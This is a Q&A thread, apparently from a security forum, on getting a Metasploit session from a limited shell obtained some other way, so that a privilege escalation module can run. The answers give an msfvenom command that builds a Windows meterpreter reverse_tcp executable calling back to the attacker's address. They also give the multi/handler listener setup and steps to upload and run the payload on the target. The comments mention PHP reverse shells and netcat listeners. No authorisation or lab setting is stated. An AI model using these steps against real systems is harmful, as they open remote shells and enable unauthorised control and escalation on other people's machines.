# Need a session ID to make a privilege escalation MSF module works

Tags: metasploit

I have a limited shell on a machine and I would like to use a Metasploit module to escalate privileges. Problem: I did not get the limited shell with a metasploit module, and the metasploit module for escalation asks for a session ID.

So my question is: how can I turn my limited shell (which I get without metasploit) into a metasploit session ?

Answer (score 2):

You can generate an platform specific executable with msfvenom. For example:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=<yourport> -f exe > meter.exe
```

You bring that exe to the target through your limited shell. Then you start a listener in metasploit:

```
use exploit/handler/multi (or exploit/multi/handler, don't remember)
set payload windows/meterpreter/reverse_tcp (needs to be the same as above)
set LHOST <your ip>
set LPORT <your port> (these 2 need to be the same as above)
run
```

and after that you start the exe on the target. Then you should get a meterpreter session. Let me know if it still doesn't work.

Comment: Ok thanks, I just discovered it by myself, but I'm stuck now because I need a reverse php for windows and there is no such thing in Metasploit library

Comment: Why do you need php? Do you have a php cmd executor and not a real "cmd.exe" type of shell?

Comment: My reverse shell can only be a .php file, because this is the only type of file I can make the server execute

Comment: I'm stuck here...

Comment: Isn't it possible to not say to metasploit that I'll use any reverse shell (on the 2nd part of you answer) ? I just want metasploit to have the same behaviour as a simple "nc -lp 4444"

Comment: @adrTulPKJ44 Sorry I don't get this. You don't want a reverse shell but a bind shell, is that what you're asking?

Answer (score 2):

Ok I finally did it. I'll try to explain what I did.

I wanted to get a meterpreter shell on a machine on which I was already abble to have a shell (but without Metasploit). The reason why I wanted a meterpreter shell is because I need a Metasploit Session in order to use a Metasploit Module for privilege escalation.

So I wanted to use my php_reverse shell for windows machines (which is not a .exe but a php and works only on windows machines) with Multi/Handler, but It's not possible (and there is no equivalent in Metasploit library, I've checked several times).
  So I finally uploaded an https_reverse_shell in a .exe format and was abble to use Multi/Handler.